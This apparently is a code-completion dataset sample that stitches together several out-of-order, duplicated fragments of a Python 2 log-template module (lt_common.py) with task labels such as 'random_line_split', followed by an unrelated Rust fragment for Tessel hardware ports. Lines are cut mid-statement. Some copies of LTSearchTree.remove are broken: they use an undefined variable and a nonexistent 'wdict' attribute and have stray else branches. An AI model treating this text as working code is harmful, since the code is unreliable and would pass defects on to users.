assert not self.ltdict.has_key(ltline.ltid)
self.ltdict[ltline.ltid] = ltline
def remove_lt(self, ltid):
self.ltdict.pop(ltid)
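# Example sketch (sample words are made up): how LTTable hands out ids and
# restores previously stored templates.
def _example_lttable():
    table = LTTable("**")
    ltid = table.next_ltid()              # 0 for an empty table
    table.restore_lt(ltid, ltid, ["connect", "from", "**"], None, 1)
    assert table.next_ltid() == 1         # next unused integer id
    assert len(table) == 1
    return table[ltid]                    # the restored LogTemplate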
class LogTemplate():
|
class LTGroup(object):
# usually used as super class of other ltgroup
# If used directly, this class will work as a dummy
# (ltgid is always same as ltid)
def __init__(self):
self.init_dict()
def init_dict(self):
self.d_group = {} # key : groupid, val : [ltline, ...]
self.d_rgroup = {} # key : ltid, val : groupid
def _next_groupid(self):
cnt = 0
while self.d_group.has_key(cnt):
cnt += 1
else:
return cnt
def add(self, ltline):
gid = ltline.ltid
self.add_ltid(gid, ltline)
return gid
def add_ltid(self, gid, ltline):
self.d_group.setdefault(gid, []).append(ltline)
self.d_rgroup[ltline.ltid] = gid
def restore_ltg(self, db, table):
for ltid, ltgid in db.iter_ltg_def():
self.d_group.setdefault(ltgid, []).append(table[ltid])
self.d_rgroup[ltid] = ltgid
class LTSearchTree():
# Search tree for un-incremental lt generation algorithms
def __init__(self, sym):
self.sym = sym
self.root = self._new_node()
def __str__(self):
l_buf = []
def print_children(point, depth):
word = point.word
if word is None: word = "**"
buf = "-" * depth + " {0}".format(point.word)
if point.end is not None:
buf += " <-- ltid {0}".format(point.end)
l_buf.append(buf)
for word in point.windex.keys():
print_children(point.windex[word], depth + 1)
if point.wild is not None:
print_children(point.wild, depth + 1)
point = self.root
l_buf.append("<head of log template search tree>")
for word in point.windex.keys():
print_children(point.windex[word], 1)
if point.wild is not None:
print_children(point.wild, 1)
return "\n".join(l_buf)
@staticmethod
def _new_node(parent = None, word = None):
return LTSearchTreeNode(parent, word)
def add(self, ltid, ltwords):
point = self.root
for w in ltwords:
if w == self.sym:
if point.wild is None:
point.wild = self._new_node(point, w)
point = point.wild
else:
if not point.windex.has_key(w):
point.windex[w] = self._new_node(point, w)
point = point.windex[w]
else:
point.set_ltid(ltid)
def _trace(self, ltwords):
point = self.root
for w in ltwords:
if w == self.sym:
if point.wild is None:
return None
else:
point = point.wild
elif point.windex.has_key(w):
point = point.windex[w]
elif point.wild is not None:
point = point.wild
else:
return None
else:
return point
    def remove(self, ltid, ltwords):
        point = self._trace(ltwords)
        if point is None:
            _logger.warning(
                    "LTSearchTree : Failed to remove ltid {0}".format(ltid))
            return
        point.remove_ltid(ltid)
        while point.unnecessary():
            w = point.word
            point = point.parent
            if w is None:
                point.wild = None
            else:
                point.windex.pop(w)
else:
if self.root is None:
self.root = self._new_node()
def search(self, ltwords):
node = self._trace(ltwords)
if node is None:
return None
else:
return node.get_ltid()
class LTSearchTreeNode():
def __init__(self, parent, word):
self.windex = {}
self.wild = None
self.end = None
self.parent = parent # for reverse search to remove
self.word = word
def child(self, word = None):
if word is None:
# wildcard
return self.wild
elif self.windex.has_key(word):
return self.windex[word]
else:
return None
def set_ltid(self, ltid):
self.end = ltid
def remove_ltid(self, ltid):
assert self.end == ltid
self.end = None
def get_ltid(self):
return self.end
def unnecessary(self):
return (len(self.windex) == 0) and \
(self.wild is None) and \
(self.end is None)
def merge_lt(m1, m2, sym):
#return common area of log message (to be log template)
ret = []
for w1, w2 in zip(m1, m2):
if w1 == w2:
ret.append(w1)
else:
ret.append(sym)
return ret
| def __init__(self, ltid, ltgid, ltw, lts, count, sym):
self.ltid = ltid
self.ltgid = ltgid
self.ltw = ltw
self.lts = lts
self.cnt = count
self.sym = sym
def __str__(self):
return self.restore_message(self.ltw)
def var(self, l_w):
return [w_org for w_org, w_lt in zip(l_w, self.ltw)
if w_lt == self.sym]
def var_location(self):
return [i for i, w_lt in enumerate(self.ltw) if w_lt == self.sym]
def restore_message(self, l_w):
if self.lts is None:
return "".join(l_w)
else:
return "".join([s + w for w, s in zip(l_w + [""], self.lts)])
def count(self):
self.cnt += 1
return self.cnt
def replace(self, l_w, l_s = None, count = None):
self.ltw = l_w
if l_s is not None:
self.lts = l_s
if count is not None:
self.cnt = count | identifier_body |
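# Example sketch (sample data made up): what a LogTemplate stores and how
# restore_message()/var() relate the template to a concrete log line.
def _example_logtemplate():
    lt = LogTemplate(0, 0, ["connect", "from", "**"],
                     ["", " ", " ", ""], 1, "**")
    words = ["connect", "from", "192.168.0.1"]
    assert str(lt) == "connect from **"
    assert lt.restore_message(words) == "connect from 192.168.0.1"
    assert lt.var(words) == ["192.168.0.1"]
    assert lt.var_location() == [2]
    return lt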
lt_common.py | #!/usr/bin/env python
# coding: utf-8
import os
import logging
import cPickle as pickle
_logger = logging.getLogger(__name__)
class LTManager(object):
    # adding lt to db (ltgen itself does not add)
def __init__(self, conf, db, table, reset_db, ltg_alg):
self.reset_db = reset_db
self.conf = conf
self.sym = conf.get("log_template", "variable_symbol")
self.filename = conf.get("log_template", "indata_filename")
self.db = db # log_db.LogDB
self.table = table # LTTable
self.ltgroup = self._init_ltgroup(ltg_alg) # LTGroup
if os.path.exists(self.filename) and not reset_db:
self.load()
def _init_ltgroup(self, ltg_alg):
if ltg_alg == "shiso":
import lt_shiso
ltgroup = lt_shiso.LTGroupSHISO(self.table,
ngram_length = self.conf.getint(
"log_template_shiso", "ltgroup_ngram_length"),
th_lookup = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_lookup"),
th_distance = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_distance"),
mem_ngram = self.conf.getboolean(
"log_template_shiso", "ltgroup_mem_ngram")
)
elif ltg_alg == "none":
ltgroup = LTGroup()
else:
raise ValueError("ltgroup_alg({0}) invalid".format(ltg_alg))
if not self.reset_db:
ltgroup.restore_ltg(self.db, self.table)
return ltgroup
def process_line(self, l_w, l_s):
# return ltline object
# if ltline is None, it means lt not found in pre-defined table
raise NotImplementedError
def add_lt(self, l_w, l_s, cnt = 1):
# add new lt to db and table
ltid = self.table.next_ltid()
ltline = LogTemplate(ltid, None, l_w, l_s, cnt, self.sym)
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.table.add_lt(ltline)
self.db.add_lt(ltline)
return ltline
def replace_lt(self, ltid, l_w, l_s = None, cnt = None):
self.table[ltid].replace(l_w, l_s, cnt)
self.db.update_lt(ltid, l_w, l_s, cnt)
def replace_and_count_lt(self, ltid, l_w, l_s = None):
cnt = self.table[ltid].count()
self.table[ltid].replace(l_w, l_s, None)
self.db.update_lt(ltid, l_w, l_s, cnt)
def count_lt(self, ltid):
cnt = self.table[ltid].count()
self.db.update_lt(ltid, None, None, cnt)
def remove_lt(self, ltid):
self.table.remove_lt(ltid)
self.db.remove_lt(ltid)
def remake_ltg(self):
self.db.reset_ltg()
self.ltgroup.init_dict()
temp_table = self.table
self.ltgroup.table = LTTable(self.sym)
for ltline in temp_table:
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.ltgroup.table.add_lt(ltline)
self.db.add_ltg(ltline.ltid, ltgid)
assert self.ltgroup.table.ltdict == temp_table.ltdict
def load(self):
pass
def dump(self):
pass
def _load_pickle(self):
with open(self.filename, 'r') as f:
return pickle.load(f)
def _dump_pickle(self, obj):
with open(self.filename, 'w') as f:
pickle.dump(obj, f)
class LTTable():
def __init__(self, sym):
self.ltdict = {}
self.sym = sym
def __iter__(self):
return self._generator()
def _generator(self):
for ltid in self.ltdict.keys():
yield self.ltdict[ltid]
def __len__(self):
return len(self.ltdict)
def __getitem__(self, key):
assert isinstance(key, int)
if not self.ltdict.has_key(key):
raise IndexError("list index out of range")
return self.ltdict[key]
def next_ltid(self):
cnt = 0
while self.ltdict.has_key(cnt):
cnt += 1
else:
return cnt
def restore_lt(self, ltid, ltgid, ltw, lts, count):
assert not self.ltdict.has_key(ltid)
self.ltdict[ltid] = LogTemplate(ltid, ltgid, ltw, lts, count, self.sym)
def add_lt(self, ltline):
assert not self.ltdict.has_key(ltline.ltid)
self.ltdict[ltline.ltid] = ltline
def remove_lt(self, ltid):
self.ltdict.pop(ltid)
class LogTemplate():
def __init__(self, ltid, ltgid, ltw, lts, count, sym):
self.ltid = ltid
self.ltgid = ltgid
self.ltw = ltw
self.lts = lts
self.cnt = count
self.sym = sym
def __str__(self):
return self.restore_message(self.ltw)
def var(self, l_w):
return [w_org for w_org, w_lt in zip(l_w, self.ltw)
if w_lt == self.sym]
def var_location(self):
return [i for i, w_lt in enumerate(self.ltw) if w_lt == self.sym]
def restore_message(self, l_w):
if self.lts is None:
return "".join(l_w)
else:
return "".join([s + w for w, s in zip(l_w + [""], self.lts)])
def count(self):
self.cnt += 1
return self.cnt
def replace(self, l_w, l_s = None, count = None):
self.ltw = l_w
if l_s is not None:
self.lts = l_s
if count is not None:
self.cnt = count
class LTGroup(object):
# usually used as super class of other ltgroup
# If used directly, this class will work as a dummy
# (ltgid is always same as ltid)
def __init__(self):
self.init_dict()
def init_dict(self):
self.d_group = {} # key : groupid, val : [ltline, ...]
self.d_rgroup = {} # key : ltid, val : groupid
def _next_groupid(self):
cnt = 0
while self.d_group.has_key(cnt):
cnt += 1
else:
return cnt
def add(self, ltline):
gid = ltline.ltid
self.add_ltid(gid, ltline)
return gid
def add_ltid(self, gid, ltline):
self.d_group.setdefault(gid, []).append(ltline)
self.d_rgroup[ltline.ltid] = gid
def restore_ltg(self, db, table):
for ltid, ltgid in db.iter_ltg_def():
self.d_group.setdefault(ltgid, []).append(table[ltid])
self.d_rgroup[ltid] = ltgid
class LTSearchTree():
# Search tree for un-incremental lt generation algorithms
def __init__(self, sym):
self.sym = sym
self.root = self._new_node()
def __str__(self):
l_buf = []
def print_children(point, depth):
word = point.word
if word is None: word = "**"
buf = "-" * depth + " {0}".format(point.word)
if point.end is not None:
buf += " <-- ltid {0}".format(point.end)
l_buf.append(buf)
for word in point.windex.keys():
print_children(point.windex[word], depth + 1)
if point.wild is not None:
print_children(point.wild, depth + 1)
point = self.root
l_buf.append("<head of log template search tree>")
for word in point.windex.keys():
print_children(point.windex[word], 1)
if point.wild is not None:
print_children(point.wild, 1)
return "\n".join(l_buf)
@staticmethod
def _new_node(parent = None, word = None):
return LTSearchTreeNode(parent, word)
def add(self, ltid, ltwords): | if point.wild is None:
point.wild = self._new_node(point, w)
point = point.wild
else:
if not point.windex.has_key(w):
point.windex[w] = self._new_node(point, w)
point = point.windex[w]
else:
point.set_ltid(ltid)
def _trace(self, ltwords):
point = self.root
for w in ltwords:
if w == self.sym:
if point.wild is None:
return None
else:
point = point.wild
elif point.windex.has_key(w):
point = point.windex[w]
elif point.wild is not None:
point = point.wild
else:
return None
else:
return point
    def remove(self, ltid, ltwords):
        point = self._trace(ltwords)
        if point is None:
            _logger.warning(
                    "LTSearchTree : Failed to remove ltid {0}".format(ltid))
            return
        point.remove_ltid(ltid)
        while point.unnecessary():
            w = point.word
            point = point.parent
            if w is None:
                point.wild = None
            else:
                point.windex.pop(w)
else:
if self.root is None:
self.root = self._new_node()
def search(self, ltwords):
node = self._trace(ltwords)
if node is None:
return None
else:
return node.get_ltid()
class LTSearchTreeNode():
def __init__(self, parent, word):
self.windex = {}
self.wild = None
self.end = None
self.parent = parent # for reverse search to remove
self.word = word
def child(self, word = None):
if word is None:
# wildcard
return self.wild
elif self.windex.has_key(word):
return self.windex[word]
else:
return None
def set_ltid(self, ltid):
self.end = ltid
def remove_ltid(self, ltid):
assert self.end == ltid
self.end = None
def get_ltid(self):
return self.end
def unnecessary(self):
return (len(self.windex) == 0) and \
(self.wild is None) and \
(self.end is None)
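# Example sketch (sample words made up): registering a template in the search
# tree and looking it up with a concrete message; the variable symbol acts as
# a wildcard during the lookup.
def _example_searchtree():
    tree = LTSearchTree("**")
    tree.add(0, ["connect", "from", "**"])
    assert tree.search(["connect", "from", "192.168.0.1"]) == 0
    assert tree.search(["disconnect", "from", "192.168.0.1"]) is None
    return tree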
def merge_lt(m1, m2, sym):
#return common area of log message (to be log template)
ret = []
for w1, w2 in zip(m1, m2):
if w1 == w2:
ret.append(w1)
else:
ret.append(sym)
return ret | point = self.root
for w in ltwords:
if w == self.sym: | random_line_split |
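# Example sketch: merge_lt() keeps the words two tokenized messages share and
# replaces every differing position with the variable symbol.
def _example_merge_lt():
    m1 = ["connect", "from", "192.168.0.1"]
    m2 = ["connect", "from", "10.0.0.2"]
    assert merge_lt(m1, m2, "**") == ["connect", "from", "**"]
    return merge_lt(m1, m2, "**")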
lt_common.py | #!/usr/bin/env python
# coding: utf-8
import os
import cPickle as pickle
class LTManager(object):
# adding lt to db (ltgen do not add)
def __init__(self, conf, db, table, reset_db, ltg_alg):
self.reset_db = reset_db
self.conf = conf
self.sym = conf.get("log_template", "variable_symbol")
self.filename = conf.get("log_template", "indata_filename")
self.db = db # log_db.LogDB
self.table = table # LTTable
self.ltgroup = self._init_ltgroup(ltg_alg) # LTGroup
if os.path.exists(self.filename) and not reset_db:
self.load()
def _init_ltgroup(self, ltg_alg):
if ltg_alg == "shiso":
import lt_shiso
ltgroup = lt_shiso.LTGroupSHISO(self.table,
ngram_length = self.conf.getint(
"log_template_shiso", "ltgroup_ngram_length"),
th_lookup = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_lookup"),
th_distance = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_distance"),
mem_ngram = self.conf.getboolean(
"log_template_shiso", "ltgroup_mem_ngram")
)
elif ltg_alg == "none":
ltgroup = LTGroup()
else:
raise ValueError("ltgroup_alg({0}) invalid".format(ltg_alg))
if not self.reset_db:
ltgroup.restore_ltg(self.db, self.table)
return ltgroup
def process_line(self, l_w, l_s):
# return ltline object
# if ltline is None, it means lt not found in pre-defined table
raise NotImplementedError
def add_lt(self, l_w, l_s, cnt = 1):
# add new lt to db and table
ltid = self.table.next_ltid()
ltline = LogTemplate(ltid, None, l_w, l_s, cnt, self.sym)
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.table.add_lt(ltline)
self.db.add_lt(ltline)
return ltline
def replace_lt(self, ltid, l_w, l_s = None, cnt = None):
self.table[ltid].replace(l_w, l_s, cnt)
self.db.update_lt(ltid, l_w, l_s, cnt)
def replace_and_count_lt(self, ltid, l_w, l_s = None):
cnt = self.table[ltid].count()
self.table[ltid].replace(l_w, l_s, None)
self.db.update_lt(ltid, l_w, l_s, cnt)
def count_lt(self, ltid):
cnt = self.table[ltid].count()
self.db.update_lt(ltid, None, None, cnt)
def remove_lt(self, ltid):
self.table.remove_lt(ltid)
self.db.remove_lt(ltid)
def remake_ltg(self):
self.db.reset_ltg()
self.ltgroup.init_dict()
temp_table = self.table
self.ltgroup.table = LTTable(self.sym)
for ltline in temp_table:
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.ltgroup.table.add_lt(ltline)
self.db.add_ltg(ltline.ltid, ltgid)
assert self.ltgroup.table.ltdict == temp_table.ltdict
def load(self):
pass
def dump(self):
pass
def _load_pickle(self):
with open(self.filename, 'r') as f:
return pickle.load(f)
def _dump_pickle(self, obj):
with open(self.filename, 'w') as f:
pickle.dump(obj, f)
class LTTable():
def __init__(self, sym):
self.ltdict = {}
self.sym = sym
def __iter__(self):
return self._generator()
def _generator(self):
for ltid in self.ltdict.keys():
yield self.ltdict[ltid]
def __len__(self):
return len(self.ltdict)
def __getitem__(self, key):
assert isinstance(key, int)
if not self.ltdict.has_key(key):
raise IndexError("list index out of range")
return self.ltdict[key]
def next_ltid(self):
cnt = 0
while self.ltdict.has_key(cnt):
cnt += 1
else:
return cnt
def restore_lt(self, ltid, ltgid, ltw, lts, count):
assert not self.ltdict.has_key(ltid)
self.ltdict[ltid] = LogTemplate(ltid, ltgid, ltw, lts, count, self.sym)
def add_lt(self, ltline):
assert not self.ltdict.has_key(ltline.ltid)
self.ltdict[ltline.ltid] = ltline
def remove_lt(self, ltid):
self.ltdict.pop(ltid)
class LogTemplate():
def __init__(self, ltid, ltgid, ltw, lts, count, sym):
self.ltid = ltid
self.ltgid = ltgid
self.ltw = ltw
self.lts = lts
self.cnt = count
self.sym = sym
def __str__(self):
return self.restore_message(self.ltw)
def var(self, l_w):
return [w_org for w_org, w_lt in zip(l_w, self.ltw)
if w_lt == self.sym]
def var_location(self):
return [i for i, w_lt in enumerate(self.ltw) if w_lt == self.sym]
def restore_message(self, l_w):
if self.lts is None:
|
else:
return "".join([s + w for w, s in zip(l_w + [""], self.lts)])
def count(self):
self.cnt += 1
return self.cnt
def replace(self, l_w, l_s = None, count = None):
self.ltw = l_w
if l_s is not None:
self.lts = l_s
if count is not None:
self.cnt = count
class LTGroup(object):
# usually used as super class of other ltgroup
# If used directly, this class will work as a dummy
# (ltgid is always same as ltid)
def __init__(self):
self.init_dict()
def init_dict(self):
self.d_group = {} # key : groupid, val : [ltline, ...]
self.d_rgroup = {} # key : ltid, val : groupid
def _next_groupid(self):
cnt = 0
while self.d_group.has_key(cnt):
cnt += 1
else:
return cnt
def add(self, ltline):
gid = ltline.ltid
self.add_ltid(gid, ltline)
return gid
def add_ltid(self, gid, ltline):
self.d_group.setdefault(gid, []).append(ltline)
self.d_rgroup[ltline.ltid] = gid
def restore_ltg(self, db, table):
for ltid, ltgid in db.iter_ltg_def():
self.d_group.setdefault(ltgid, []).append(table[ltid])
self.d_rgroup[ltid] = ltgid
class LTSearchTree():
# Search tree for un-incremental lt generation algorithms
def __init__(self, sym):
self.sym = sym
self.root = self._new_node()
def __str__(self):
l_buf = []
def print_children(point, depth):
word = point.word
if word is None: word = "**"
buf = "-" * depth + " {0}".format(point.word)
if point.end is not None:
buf += " <-- ltid {0}".format(point.end)
l_buf.append(buf)
for word in point.windex.keys():
print_children(point.windex[word], depth + 1)
if point.wild is not None:
print_children(point.wild, depth + 1)
point = self.root
l_buf.append("<head of log template search tree>")
for word in point.windex.keys():
print_children(point.windex[word], 1)
if point.wild is not None:
print_children(point.wild, 1)
return "\n".join(l_buf)
@staticmethod
def _new_node(parent = None, word = None):
return LTSearchTreeNode(parent, word)
def add(self, ltid, ltwords):
point = self.root
for w in ltwords:
if w == self.sym:
if point.wild is None:
point.wild = self._new_node(point, w)
point = point.wild
else:
if not point.windex.has_key(w):
point.windex[w] = self._new_node(point, w)
point = point.windex[w]
else:
point.set_ltid(ltid)
def _trace(self, ltwords):
point = self.root
for w in ltwords:
if w == self.sym:
if point.wild is None:
return None
else:
point = point.wild
elif point.windex.has_key(w):
point = point.windex[w]
elif point.wild is not None:
point = point.wild
else:
return None
else:
return point
def remove(self, ltid, ltwords):
node = self._trace(ltwords)
if node is None:
_logger.warning(
"LTSearchTree : Failed to remove ltid {0}".format(ltid))
point.remove_ltid(ltid)
while point.unnecessary():
w = point.word
point = point.parent
if w is None:
point.wild = None
else:
point.wdict.pop(w)
else:
if self.root is None:
self.root = self._new_node()
def search(self, ltwords):
node = self._trace(ltwords)
if node is None:
return None
else:
return node.get_ltid()
class LTSearchTreeNode():
def __init__(self, parent, word):
self.windex = {}
self.wild = None
self.end = None
self.parent = parent # for reverse search to remove
self.word = word
def child(self, word = None):
if word is None:
# wildcard
return self.wild
elif self.windex.has_key(word):
return self.windex[word]
else:
return None
def set_ltid(self, ltid):
self.end = ltid
def remove_ltid(self, ltid):
assert self.end == ltid
self.end = None
def get_ltid(self):
return self.end
def unnecessary(self):
return (len(self.windex) == 0) and \
(self.wild is None) and \
(self.end is None)
def merge_lt(m1, m2, sym):
#return common area of log message (to be log template)
ret = []
for w1, w2 in zip(m1, m2):
if w1 == w2:
ret.append(w1)
else:
ret.append(sym)
return ret
| return "".join(l_w) | conditional_block |
lt_common.py | #!/usr/bin/env python
# coding: utf-8
import os
import cPickle as pickle
class LTManager(object):
# adding lt to db (ltgen do not add)
def __init__(self, conf, db, table, reset_db, ltg_alg):
self.reset_db = reset_db
self.conf = conf
self.sym = conf.get("log_template", "variable_symbol")
self.filename = conf.get("log_template", "indata_filename")
self.db = db # log_db.LogDB
self.table = table # LTTable
self.ltgroup = self._init_ltgroup(ltg_alg) # LTGroup
if os.path.exists(self.filename) and not reset_db:
self.load()
def _init_ltgroup(self, ltg_alg):
if ltg_alg == "shiso":
import lt_shiso
ltgroup = lt_shiso.LTGroupSHISO(self.table,
ngram_length = self.conf.getint(
"log_template_shiso", "ltgroup_ngram_length"),
th_lookup = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_lookup"),
th_distance = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_distance"),
mem_ngram = self.conf.getboolean(
"log_template_shiso", "ltgroup_mem_ngram")
)
elif ltg_alg == "none":
ltgroup = LTGroup()
else:
raise ValueError("ltgroup_alg({0}) invalid".format(ltg_alg))
if not self.reset_db:
ltgroup.restore_ltg(self.db, self.table)
return ltgroup
def process_line(self, l_w, l_s):
# return ltline object
# if ltline is None, it means lt not found in pre-defined table
raise NotImplementedError
def add_lt(self, l_w, l_s, cnt = 1):
# add new lt to db and table
ltid = self.table.next_ltid()
ltline = LogTemplate(ltid, None, l_w, l_s, cnt, self.sym)
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.table.add_lt(ltline)
self.db.add_lt(ltline)
return ltline
def replace_lt(self, ltid, l_w, l_s = None, cnt = None):
self.table[ltid].replace(l_w, l_s, cnt)
self.db.update_lt(ltid, l_w, l_s, cnt)
def replace_and_count_lt(self, ltid, l_w, l_s = None):
cnt = self.table[ltid].count()
self.table[ltid].replace(l_w, l_s, None)
self.db.update_lt(ltid, l_w, l_s, cnt)
def count_lt(self, ltid):
cnt = self.table[ltid].count()
self.db.update_lt(ltid, None, None, cnt)
def | (self, ltid):
self.table.remove_lt(ltid)
self.db.remove_lt(ltid)
def remake_ltg(self):
self.db.reset_ltg()
self.ltgroup.init_dict()
temp_table = self.table
self.ltgroup.table = LTTable(self.sym)
for ltline in temp_table:
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.ltgroup.table.add_lt(ltline)
self.db.add_ltg(ltline.ltid, ltgid)
assert self.ltgroup.table.ltdict == temp_table.ltdict
def load(self):
pass
def dump(self):
pass
def _load_pickle(self):
with open(self.filename, 'r') as f:
return pickle.load(f)
def _dump_pickle(self, obj):
with open(self.filename, 'w') as f:
pickle.dump(obj, f)
class LTTable():
def __init__(self, sym):
self.ltdict = {}
self.sym = sym
def __iter__(self):
return self._generator()
def _generator(self):
for ltid in self.ltdict.keys():
yield self.ltdict[ltid]
def __len__(self):
return len(self.ltdict)
def __getitem__(self, key):
assert isinstance(key, int)
if not self.ltdict.has_key(key):
raise IndexError("list index out of range")
return self.ltdict[key]
def next_ltid(self):
cnt = 0
while self.ltdict.has_key(cnt):
cnt += 1
else:
return cnt
def restore_lt(self, ltid, ltgid, ltw, lts, count):
assert not self.ltdict.has_key(ltid)
self.ltdict[ltid] = LogTemplate(ltid, ltgid, ltw, lts, count, self.sym)
def add_lt(self, ltline):
assert not self.ltdict.has_key(ltline.ltid)
self.ltdict[ltline.ltid] = ltline
def remove_lt(self, ltid):
self.ltdict.pop(ltid)
class LogTemplate():
def __init__(self, ltid, ltgid, ltw, lts, count, sym):
self.ltid = ltid
self.ltgid = ltgid
self.ltw = ltw
self.lts = lts
self.cnt = count
self.sym = sym
def __str__(self):
return self.restore_message(self.ltw)
def var(self, l_w):
return [w_org for w_org, w_lt in zip(l_w, self.ltw)
if w_lt == self.sym]
def var_location(self):
return [i for i, w_lt in enumerate(self.ltw) if w_lt == self.sym]
def restore_message(self, l_w):
if self.lts is None:
return "".join(l_w)
else:
return "".join([s + w for w, s in zip(l_w + [""], self.lts)])
def count(self):
self.cnt += 1
return self.cnt
def replace(self, l_w, l_s = None, count = None):
self.ltw = l_w
if l_s is not None:
self.lts = l_s
if count is not None:
self.cnt = count
class LTGroup(object):
# usually used as super class of other ltgroup
# If used directly, this class will work as a dummy
# (ltgid is always same as ltid)
def __init__(self):
self.init_dict()
def init_dict(self):
self.d_group = {} # key : groupid, val : [ltline, ...]
self.d_rgroup = {} # key : ltid, val : groupid
def _next_groupid(self):
cnt = 0
while self.d_group.has_key(cnt):
cnt += 1
else:
return cnt
def add(self, ltline):
gid = ltline.ltid
self.add_ltid(gid, ltline)
return gid
def add_ltid(self, gid, ltline):
self.d_group.setdefault(gid, []).append(ltline)
self.d_rgroup[ltline.ltid] = gid
def restore_ltg(self, db, table):
for ltid, ltgid in db.iter_ltg_def():
self.d_group.setdefault(ltgid, []).append(table[ltid])
self.d_rgroup[ltid] = ltgid
class LTSearchTree():
# Search tree for un-incremental lt generation algorithms
def __init__(self, sym):
self.sym = sym
self.root = self._new_node()
def __str__(self):
l_buf = []
def print_children(point, depth):
word = point.word
if word is None: word = "**"
buf = "-" * depth + " {0}".format(point.word)
if point.end is not None:
buf += " <-- ltid {0}".format(point.end)
l_buf.append(buf)
for word in point.windex.keys():
print_children(point.windex[word], depth + 1)
if point.wild is not None:
print_children(point.wild, depth + 1)
point = self.root
l_buf.append("<head of log template search tree>")
for word in point.windex.keys():
print_children(point.windex[word], 1)
if point.wild is not None:
print_children(point.wild, 1)
return "\n".join(l_buf)
@staticmethod
def _new_node(parent = None, word = None):
return LTSearchTreeNode(parent, word)
def add(self, ltid, ltwords):
point = self.root
for w in ltwords:
if w == self.sym:
if point.wild is None:
point.wild = self._new_node(point, w)
point = point.wild
else:
if not point.windex.has_key(w):
point.windex[w] = self._new_node(point, w)
point = point.windex[w]
else:
point.set_ltid(ltid)
def _trace(self, ltwords):
point = self.root
for w in ltwords:
if w == self.sym:
if point.wild is None:
return None
else:
point = point.wild
elif point.windex.has_key(w):
point = point.windex[w]
elif point.wild is not None:
point = point.wild
else:
return None
else:
return point
def remove(self, ltid, ltwords):
node = self._trace(ltwords)
if node is None:
_logger.warning(
"LTSearchTree : Failed to remove ltid {0}".format(ltid))
point.remove_ltid(ltid)
while point.unnecessary():
w = point.word
point = point.parent
if w is None:
point.wild = None
else:
point.wdict.pop(w)
else:
if self.root is None:
self.root = self._new_node()
def search(self, ltwords):
node = self._trace(ltwords)
if node is None:
return None
else:
return node.get_ltid()
class LTSearchTreeNode():
def __init__(self, parent, word):
self.windex = {}
self.wild = None
self.end = None
self.parent = parent # for reverse search to remove
self.word = word
def child(self, word = None):
if word is None:
# wildcard
return self.wild
elif self.windex.has_key(word):
return self.windex[word]
else:
return None
def set_ltid(self, ltid):
self.end = ltid
def remove_ltid(self, ltid):
assert self.end == ltid
self.end = None
def get_ltid(self):
return self.end
def unnecessary(self):
return (len(self.windex) == 0) and \
(self.wild is None) and \
(self.end is None)
def merge_lt(m1, m2, sym):
#return common area of log message (to be log template)
ret = []
for w1, w2 in zip(m1, m2):
if w1 == w2:
ret.append(w1)
else:
ret.append(sym)
return ret
| remove_lt | identifier_name |
lib.rs | extern crate unix_socket;
pub mod protocol;
use protocol::{Command, reply, PortSocket};
use std::collections::HashMap;
use std::fs::File;
use std::io;
use std::io::prelude::*;
use std::sync::Arc;
use std::sync::{Mutex, MutexGuard, TryLockError};
use std::u8;
// TODO Corking reduces latency, as spid adds overhead for each packet
// Paths to the SPI daemon sockets with incoming data from coprocessor.
const PORT_A_UDS_PATH: &'static str = "/var/run/tessel/port_a";
const PORT_B_UDS_PATH: &'static str = "/var/run/tessel/port_b";
const MCU_MAX_SPEED: u32 = 48e6 as u32;
// TODO: Replace with better name
const MCU_MAX_SCL_RISE_TIME_NS: f64 = 1.5e-8 as f64;
const MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD: u8 = 2;
const MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD: u8 = 5;
/// Primary exported Tessel object with access to module ports, LEDs, and a button.
/// # Example
/// ```
/// use tessel::Tessel;
///
/// # #[allow(dead_code)]
/// # fn example() {
/// let t = Tessel::new();
/// // Tessel 2 has four LEDs available.
/// assert_eq!(t.led.len(), 4);
/// // Tessel 2 has two ports labelled a and b
/// let a = t.port.a;
/// let b = t.port.b;
/// # }
/// ```
pub struct Tessel {
// A group of module ports.
pub port: PortGroup,
// An array of LED structs.
pub led: Vec<LED>,
}
impl Tessel {
// new() returns a Tessel struct conforming to the Tessel 2's functionality.
pub fn new() -> Tessel {
// Create a port group with two ports, one on each domain socket path.
let ports = PortGroup {
a: Port::new(PORT_A_UDS_PATH),
b: Port::new(PORT_B_UDS_PATH),
};
// Create models for the four LEDs.
let red_led = LED::new("red", "error");
let amber_led = LED::new("amber", "wlan");
let green_led = LED::new("green", "user1");
let blue_led = LED::new("blue", "user2");
// Return the Tessel with these fields.
Tessel {
port: ports,
led: vec![red_led, amber_led, green_led, blue_led],
}
}
}
/// A PortGroup is a simple way to access each port through its letter identifier.
#[allow(dead_code)]
pub struct PortGroup {
pub a: Port,
pub b: Port,
}
/// A Port is a model of the Tessel hardware ports.
/// # Example
/// ```
/// use tessel::Port;
/// ```
pub struct Port {
// Path of the domain socket.
socket: Arc<Mutex<PortSocket>>,
pins: HashMap<usize, Mutex<()>>,
}
pub struct Pin<'a> {
index: usize,
_guard: MutexGuard<'a, ()>,
socket: Arc<Mutex<PortSocket>>,
}
impl<'a> Pin<'a> {
pub fn output(&mut self, value: bool) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
if value | else {
sock.write_command(Command::GpioLow(self.index as u8))
}
}
}
impl Port {
pub fn new(path: &str) -> Port {
let mut pins = HashMap::new();
for i in 0..8 {
pins.insert(i, Mutex::new(()));
}
// Create and return the port struct
Port {
socket: Arc::new(Mutex::new(PortSocket::new(path))),
pins: pins,
}
}
pub fn pin(&self, index: usize) -> Result<Pin, TryLockError<MutexGuard<()>>> {
Ok(Pin {
index: index,
_guard: try!(self.pins.get(&index).expect("TODO dont panic on pin fetch").lock()),
socket: self.socket.clone(),
})
}
